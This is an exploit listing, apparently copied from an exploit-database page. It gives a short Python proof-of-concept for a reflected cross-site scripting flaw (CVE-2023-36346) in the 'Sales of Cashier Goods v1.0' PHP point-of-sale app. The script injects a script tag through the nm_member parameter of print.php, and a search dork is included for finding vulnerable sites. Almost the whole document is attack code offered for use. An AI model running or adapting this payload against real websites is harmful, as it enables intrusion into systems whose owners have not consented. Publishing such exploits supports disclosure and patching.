Share
## https://sploitus.com/exploit?id=PACKETSTORM:173280
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)  
# Date: 2023-06-23  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Dork : /print.php?nm_member=  
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html  
# Tested on: Windows/Linux  
# CVE : CVE-2023-36346  
  
import requests  
import urllib.parse  
  
# Set the target URL and payload  
url = "http://example.com/print.php"  
payload = "<script>alert('XSS')</script>"  
  
# Encode the payload for URL inclusion  
payload = urllib.parse.quote(payload)  
  
# Build the request parameters  
params = {  
"nm_member": payload  
}  
  
# Send the request and print the response  
response = requests.get(url, params=params)  
print(response.text)